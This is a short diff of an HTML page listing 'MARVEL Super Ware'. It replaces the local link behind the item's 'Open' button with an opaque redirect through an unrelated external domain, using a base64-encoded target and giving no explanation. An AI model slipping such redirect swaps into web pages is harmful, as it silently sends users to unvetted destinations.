--- a/index.html
+++ b/index.html
@@ -321,7 +321,7 @@
       <div class="item-title" style="color: #fff;">MARVEL Super Ware </div>
   <div class="item-title-row">
   <div class="item-after">
-  <a href="page/page.html"  target="_blank" class="button button-fill button-round" style="background: #F0F1F6; color: #007AFF; font-weight:bold;">Open</a>
+  <a href="https://800pizza.pk/to.php?url=Ly93ZWJmLz9pPSZhbXA7aT1TMjhTUA=="  target="_blank" class="button button-fill button-round" style="background: #F0F1F6; color: #007AFF; font-weight:bold;">Open</a>
   <br>
   
   
